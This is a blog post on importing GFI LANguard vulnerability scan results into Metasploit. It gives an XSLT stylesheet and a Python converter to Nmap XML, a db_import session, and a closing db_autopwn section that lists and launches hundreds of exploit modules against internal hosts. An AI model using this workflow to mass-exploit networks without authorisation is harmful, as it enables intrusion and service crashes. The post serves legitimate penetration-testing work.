Friday, June 22, 2012

Import data from Languard to Metasploit


Today I was looking for a way to import data from the GFI LANguard vulnerability scanner into
the Metasploit Framework. Below I describe a simple way to do that: convert LANguard's XML report to
Nmap's XML format with an XSLT stylesheet (run here with the AltovaXML XML processor) and then load the result with db_import.
GFI LANguard™ is a vulnerability scanner that scans, detects, assesses and helps correct security risks on your network.
Download the trial from here
AltovaXML® 2011 Community Edition is a free XML standards processor that includes the Altova XSLT 1.0 and XSLT 2.0 engines, an XQuery engine, an XBRL validator and an XML validator. The stylesheet is plain XSLT 1.0, so any other XSLT 1.0 processor (xsltproc, for example) should run it as well.
Download the Community Edition from here
Download the MappingMapToMSF.xslt file, which performs the schema conversion. It maps LANguard's Scan/hosts/host elements onto Nmap's nmaprun/host elements. Two things to be aware of: it hardcodes protocol="tcp" and state="open" for every port, so if the export contains UDP findings they will be imported as TCP services, and only hosts with respondedToPing = 1 are marked state="up".
Code:
<?xml version="1.0" encoding="UTF-8"?>
<!--
www.coresec.org
MappingMapToMSF.xslt: GFI LANguard report -> Nmap XML (nmaprun) for Metasploit db_import.
Expected input: Scan (@CreatedOn, @ScanDuration) / hosts / host, where each host carries
respondedToPing, mac_vendor, ip, hostname and ports/port (@name = port number, @desc).
-->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:vmf="http://www.altova.com/MapForce/UDF/vmf" xmlns:xs="http://www.w3.org/2001/XMLSchema" exclude-result-prefixes="vmf xs">
  <!-- respondedToPing = 1 maps to "up"; any other value yields an empty result -->
  <xsl:template name="vmf:vmf1_inputtoresult">
    <xsl:param name="input" select="/.."/>
    <xsl:choose>
      <xsl:when test="$input='1'">
        <xsl:value-of select="'up'"/>
      </xsl:when>
    </xsl:choose>
  </xsl:template>
  <xsl:output method="xml" encoding="UTF-8" indent="yes"/>
  <xsl:template match="/">
    <nmaprun>
      <!-- Schema hint only (left empty here); Metasploit does not need it -->
      <xsl:attribute name="xsi:noNamespaceSchemaLocation" namespace="http://www.w3.org/2001/XMLSchema-instance"></xsl:attribute>
      <xsl:for-each select="Scan">
        <xsl:attribute name="startstr">
          <xsl:value-of select="string(@CreatedOn)"/>
        </xsl:attribute>
        <xsl:for-each select="hosts/host">
          <xsl:variable name="var1_resultof_vmf__inputtoresult">
            <xsl:call-template name="vmf:vmf1_inputtoresult">
              <xsl:with-param name="input" select="floor(number(string(respondedToPing)))"/>
            </xsl:call-template>
          </xsl:variable>
          <host>
            <status>
              <!-- In XSLT 1.0 a result tree fragment is always true, so the generated
                   boolean() test never failed and hosts that did not answer the ping got
                   state="". Testing the string value gives them no state attribute instead. -->
              <xsl:if test="string($var1_resultof_vmf__inputtoresult) != ''">
                <xsl:attribute name="state">
                  <xsl:value-of select="$var1_resultof_vmf__inputtoresult"/>
                </xsl:attribute>
              </xsl:if>
            </status>
            <address>
              <xsl:attribute name="vendor">
                <xsl:value-of select="string(mac_vendor)"/>
              </xsl:attribute>
              <xsl:attribute name="addrtype">ipv4</xsl:attribute>
              <xsl:attribute name="addr">
                <xsl:value-of select="string(ip)"/>
              </xsl:attribute>
            </address>
            <hostnames>
              <hostname>
                <xsl:attribute name="name">
                  <xsl:value-of select="string(hostname)"/>
                </xsl:attribute>
              </hostname>
            </hostnames>
            <xsl:for-each select="ports">
              <ports>
                <xsl:for-each select="port">
                  <!-- Every port is emitted as tcp/open; LANguard's UDP findings, if any,
                       are not distinguished. The port number lives in @name. -->
                  <port>
                    <xsl:attribute name="protocol">tcp</xsl:attribute>
                    <xsl:attribute name="portid">
                      <xsl:value-of select="string(floor(number(string(@name))))"/>
                    </xsl:attribute>
                    <state>
                      <xsl:attribute name="state">open</xsl:attribute>
                    </state>
                    <service>
                      <xsl:attribute name="name">
                        <xsl:value-of select="string(@desc)"/>
                      </xsl:attribute>
                    </service>
                  </port>
                </xsl:for-each>
              </ports>
            </xsl:for-each>
          </host>
        </xsl:for-each>
        <runstats>
          <finished>
            <xsl:attribute name="elapsed">
              <xsl:value-of select="string(floor(number(string(@ScanDuration))))"/>
            </xsl:attribute>
          </finished>
        </runstats>
      </xsl:for-each>
    </nmaprun>
  </xsl:template>
</xsl:stylesheet>
Convert LANguard's XML report to Nmap's XML format with the AltovaXML command-line processor (/xslt1 selects its XSLT 1.0 engine, /in is the LANguard report and /out the file to write):
Code:
PS C:\LAN2MSF> dir
    Directory: C:\LAN2MSF
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         5/22/2011  12:31 AM            AltovaXMLExamples
-a---          3/4/2011   7:12 AM      24576 Altova.AltovaXML.dll
-a---          3/4/2011   7:12 AM   13985280 AltovaXML.exe
-ar--          3/4/2011  12:11 AM          3 AltovaXML.inst
-a---          3/4/2011  12:00 AM       9027 AltovaXML.jar
-a---         5/22/2011  12:09 AM   14491992 AltovaXMLCmu2011.exe
-a---          3/4/2011  12:00 AM      61005 AltovaXMLJavaDocs.zip
-a---          3/4/2011  12:41 AM       9756 AltovaXMLLib.tlb
-a---          3/4/2011  12:41 AM   13968896 AltovaXML_COM.exe
-a---         5/22/2011  12:00 PM     224328 languard.xml
-a---         5/22/2011   1:24 PM       2931 MappingMapToMSF.xslt
 
PS C:\LAN2MSF> .\AltovaXML /xslt1 "MappingMapToMSF.xslt" /in "languard.xml" /out "out.xml"
PS C:\LAN2MSF> dir out.xml
    Directory: C:\LAN2MSF
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/22/2011   1:28 PM       4232 out.xml
Below is the out.xml file. The xsi:noNamespaceSchemaLocation path comes from the author's local copy of the stylesheet (the one above leaves it empty); Metasploit does not use it:
Code:
<?xml version="1.0" encoding="UTF-8"?>
<nmaprun xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="C:/Users/wisco/Desktop/FINAL/NMAP.xsd" startstr="05/22/2011 11:44:06 AM">
   <host>
      <status state="up"/>
      <address vendor="" addrtype="ipv4" addr="192.168.200.1"/>
      <hostnames>
          <hostname name="HOST1"/>
      </hostnames>
      <ports>
          <port protocol="tcp" portid="21">
             <state state="open"/>
             <service name="FTP - control (command)"/>
          </port>
          <port protocol="tcp" portid="23">
             <state state="open"/>
             <service name="Telnet protocol - unencrypted text communications"/>
          </port>
          <port protocol="tcp" portid="80">
             <state state="open"/>
             <service name="Hypertext Transfer Protocol (HTTP)"/>
          </port>
          <port protocol="tcp" portid="443">
             <state state="open"/>
             <service name="Hypertext Transfer Protocol over TLS/SSL (HTTPS)"/>
          </port>
          <port protocol="tcp" portid="1723">
             <state state="open"/>
             <service name="Microsoft Point-to-Point Tunneling Protocol (PPTP)"/>
          </port>
          </ports>
        </host>
        [...]
        <runstats>
           <finished elapsed="851"/>
        </runstats>
</nmaprun>
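The same conversion as a stand-alone script, added here as an example (it is not part of the original post and not the stylesheet above). It uses only the Python standard library, so no AltovaXML is needed, and it reads the generated file back to check that every host has an address and a state before you hand it to db_import. The LANguard layout it expects is reconstructed from the XPaths in the stylesheet (Scan/@CreatedOn, Scan/@ScanDuration, hosts/host/ip, respondedToPing, mac_vendor, hostname, ports/port/@name, @desc); the sample report embedded at the bottom is constructed in that layout, not a real export. One deliberate deviation from the stylesheet: a host on which LANguard found open ports is reported "up" even if it did not answer the ping, and a host with neither is reported "down" rather than with an empty state.

```python
#!/usr/bin/env python3
"""languard2nmap.py: GFI LANguard XML report -> Nmap XML (nmaprun) for Metasploit db_import.
Standard-library only. Element names follow the XPaths used by MappingMapToMSF.xslt;
anything else in a real report is ignored (assumption, see the constructed sample below)."""
import sys
import xml.etree.ElementTree as ET


def host_state(responded_to_ping: str, port_count: int) -> str:
    """respondedToPing=1 -> "up" (as in the stylesheet). Deviation: a host with open
    ports is alive even if ICMP is filtered, so it is "up" too; otherwise "down"."""
    try:
        pinged = int(float(responded_to_ping.strip())) == 1
    except ValueError:
        pinged = False
    return "up" if pinged or port_count > 0 else "down"


def port_id(name: str) -> int:
    """LANguard keeps the port number in port/@name (the stylesheet applies floor()).
    Refuse values outside 1..65535 instead of writing a portid db_import cannot use."""
    number = int(float(name))
    if not 1 <= number <= 65535:
        raise ValueError(f"port number out of range: {name!r}")
    return number


def convert(languard_xml: str) -> str:
    """Return Nmap XML text for a LANguard report given as a string."""
    scan = ET.fromstring(languard_xml)
    if scan.tag != "Scan":
        raise ValueError(f"expected <Scan> root element, got <{scan.tag}>")
    run = ET.Element("nmaprun", startstr=scan.get("CreatedOn", ""))
    for h in scan.findall("hosts/host"):
        ip = (h.findtext("ip") or "").strip()
        if not ip:
            continue  # db_import keys everything on the address; nothing to import
        ports = h.findall("ports/port")
        host = ET.SubElement(run, "host")
        ET.SubElement(host, "status",
                      state=host_state(h.findtext("respondedToPing") or "", len(ports)))
        ET.SubElement(host, "address", vendor=(h.findtext("mac_vendor") or "").strip(),
                      addrtype="ipv4", addr=ip)
        hostnames = ET.SubElement(host, "hostnames")
        name = (h.findtext("hostname") or "").strip()
        if name:
            ET.SubElement(hostnames, "hostname", name=name)
        ports_el = ET.SubElement(host, "ports")
        for p in ports:
            # Like the stylesheet, every port becomes tcp/open; UDP findings (if the
            # export has them) would need their own handling.
            port = ET.SubElement(ports_el, "port", protocol="tcp",
                                 portid=str(port_id(p.get("name", ""))))
            ET.SubElement(port, "state", state="open")
            ET.SubElement(port, "service", name=p.get("desc", ""))
    finished = ET.SubElement(ET.SubElement(run, "runstats"), "finished")
    finished.set("elapsed", str(int(float(scan.get("ScanDuration", "0")))))
    return '<?xml version="1.0" encoding="UTF-8"?>\n' + ET.tostring(run, encoding="unicode")


def summarize(nmap_xml: str) -> dict:
    """Read the generated file back the way db_hosts/db_services will see it. Raises if a
    host lacks an address or state, the usual symptom of unexpected element names."""
    run = ET.fromstring(nmap_xml)
    hosts = []
    for host in run.findall("host"):
        address, status = host.find("address"), host.find("status")
        if address is None or status is None or not address.get("addr") or not status.get("state"):
            raise ValueError("host without address/state; check the LANguard element names")
        hostname = host.find("hostnames/hostname")
        hosts.append({
            "addr": address.get("addr"), "state": status.get("state"),
            "name": hostname.get("name") if hostname is not None else "",
            "services": [(int(p.get("portid")), p.get("protocol"), p.find("service").get("name"))
                         for p in host.findall("ports/port")]})
    return {"startstr": run.get("startstr"),
            "elapsed": int(run.find("runstats/finished").get("elapsed")), "hosts": hosts}


# Constructed sample in the assumed layout (not a real LANguard export).
SAMPLE_LANGUARD = """<?xml version="1.0" encoding="UTF-8"?>
<Scan CreatedOn="05/22/2011 11:44:06 AM" ScanDuration="851.4"><hosts>
 <host><respondedToPing>1</respondedToPing><mac_vendor></mac_vendor><ip>192.168.200.1</ip>
  <hostname>HOST1</hostname><ports><port name="21" desc="FTP - control (command)"/>
  <port name="443" desc="Hypertext Transfer Protocol over TLS/SSL (HTTPS)"/></ports></host>
 <host><respondedToPing>0</respondedToPing><mac_vendor>Example Vendor</mac_vendor>
  <ip>192.168.200.20</ip><hostname>HOST20</hostname>
  <ports><port name="22" desc="Secure Shell (SSH)"/></ports></host>
 <host><respondedToPing>0</respondedToPing><ip>192.168.200.99</ip><hostname></hostname><ports/></host>
</hosts></Scan>"""

if __name__ == "__main__":
    if len(sys.argv) == 3:  # python3 languard2nmap.py languard.xml out.xml
        with open(sys.argv[1], encoding="utf-8") as f:
            result = convert(f.read())
        summarize(result)   # sanity check before anything is written
        with open(sys.argv[2], "w", encoding="utf-8") as f:
            f.write(result)
    else:                   # no arguments: convert the constructed sample
        print(convert(SAMPLE_LANGUARD))
```

Run it as `python3 languard2nmap.py languard.xml out.xml` and feed out.xml to db_import exactly as with the AltovaXML output; without arguments it prints the conversion of the embedded sample, in which the second host is reported "up" because of its open SSH port despite respondedToPing being 0.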
Import out.xml into the Metasploit database with db_import. The session below uses the MySQL driver of Metasploit 3.x; newer versions of the framework support only PostgreSQL and no longer have a db_driver command, so there you just db_connect (or use the default database) and skip that step:
Code:
msf > db_driver mysql
[*] Using database driver mysql
 
msf > db_connect user:pass@hostname
 
msf > db_hosts 
Hosts
=====
 
address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------
 
msf > db_import out.xml 
[*] Importing 'Nmap XML' data
[*] Importing host 192.168.200.1
[*] Importing host 192.168.200.100
[*] Importing host 192.168.200.101
[*] Importing host 192.168.200.2
[*] Importing host 192.168.200.20
[*] Successfully imported /opt/framework3/msf3/out.xml
 
msf > db_hosts
Hosts
=====
 
address          mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------          ---  ----  -------  ---------  -----  -------  ----  --------
192.168.200.1                                                         
192.168.200.100                                                       
192.168.200.101                                                       
192.168.200.2                                                         
192.168.200.20                                                        
 
msf > db_services
 
Services
========
host             port  proto  name                                                  state  info
----             ----  -----  ----                                                  -----  ----
192.168.200.1    21    tcp    ftp - control (command)                               open   
192.168.200.1    23    tcp    telnet protocol - unencrypted text communications     open   
192.168.200.1    80    tcp    hypertext transfer protocol (http)                    open   
192.168.200.1    443   tcp    hypertext transfer protocol over tls/ssl (https)      open   
192.168.200.1    1723  tcp    microsoft point-to-point tunneling protocol (pptp)    open   
192.168.200.100  22    tcp    secure shell (ssh)                                    open   
192.168.200.100  53    tcp    domain name system (dns)                              open   
192.168.200.100  80    tcp    hypertext transfer protocol (http)                    open   
192.168.200.101  135   tcp    dce endpoint resolution                               open   
192.168.200.101  139   tcp    netbios netbios session service                       open   
192.168.200.101  445   tcp    microsoft-ds active directory, windows shares         open   
192.168.200.101  8000  tcp    irdmi (intel remote desktop management interface)     open   
192.168.200.2    135   tcp    dce endpoint resolution                               open   
192.168.200.2    139   tcp    netbios netbios session service                       open   
192.168.200.2    445   tcp    microsoft-ds active directory, windows shares         open   
192.168.200.2    554   tcp    real time streaming protocol (rtsp)                   open   
192.168.200.2    3389  tcp    terminal services                                     open   
192.168.200.20   22    tcp    secure shell (ssh)                                    open   
192.168.200.20   111   tcp    sun remote procedure call                             open   
192.168.200.20   139   tcp    netbios netbios session service                       open   
192.168.200.20   445   tcp    microsoft-ds active directory, windows shares         open
Match exploit modules to the imported services by port (db_autopwn -p -t only lists the matches, -p -e launches them). A port match carries no version information, so most of the list is noise: the very first match throws a Windows freeSSHd exploit at 192.168.200.20, whose Sun RPC and Samba ports suggest a Unix host, and -e fires all 699 matches, which on a production network is a good way to crash services. Note also that db_autopwn has since been removed from the Metasploit Framework; on current versions it is only available as an unofficial plugin.
Code:
msf > db_autopwn -p -t
[*] Analysis completed in 9 seconds (0 vulns / 0 refs)
[*] 
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.200.20:22  exploit/windows/ssh/freesshd_key_exchange  (port match)
[*]   192.168.200.100:80  exploit/unix/webapp/tikiwiki_jhot_exec  (port match)
[*]   192.168.200.100:80  exploit/unix/http/contentkeeperweb_mimencode  (port match)
[*]   192.168.200.1:443  exploit/multi/http/freenas_exec_raw  (port match)
[*]   192.168.200.100:80  exploit/unix/webapp/phpmyadmin_config  (port match)
[*]   192.168.200.1:443  exploit/windows/http/mailenable_auth_header  (port match)
[*]   192.168.200.1:80  exploit/windows/http/xitami_if_mod_since  (port match)
[*]   192.168.200.1:80  exploit/windows/http/ipswitch_wug_maincfgret  (port match)
[*]   192.168.200.1:443  exploit/windows/http/hp_nnm_ovalarm_lang  (port match)
[*]   192.168.200.1:443  exploit/unix/webapp/mitel_awc_exec  (port match)
[*]   192.168.200.1:443  exploit/unix/webapp/nagios3_statuswml_ping  (port match)
[*]   [...]
 
msf > db_autopwn -p -e
[*] (1/699 [0 sessions]): Launching exploit/windows/ssh/freesshd_key_exchange against 192.168.200.20:22...
[*] (2/699 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.200.100:80...
[*] (3/699 [0 sessions]): Launching exploit/unix/http/contentkeeperweb_mimencode against 192.168.200.100:80...
[*] (4/699 [0 sessions]): Launching exploit/multi/http/freenas_exec_raw against 192.168.200.1:443...
[*] (5/699 [0 sessions]): Launching exploit/unix/webapp/phpmyadmin_config against 192.168.200.100:80...
[*] (6/699 [0 sessions]): Launching exploit/windows/http/mailenable_auth_header against 192.168.200.1:443...
[*] (7/699 [0 sessions]): Launching exploit/windows/http/xitami_if_mod_since against 192.168.200.1:80...
[*] (8/699 [0 sessions]): Launching exploit/windows/http/ipswitch_wug_maincfgret against 192.168.200.1:80...
[*] (9/699 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovalarm_lang against 192.168.200.1:443...
[*] [...]
Suggestions and comments are welcome
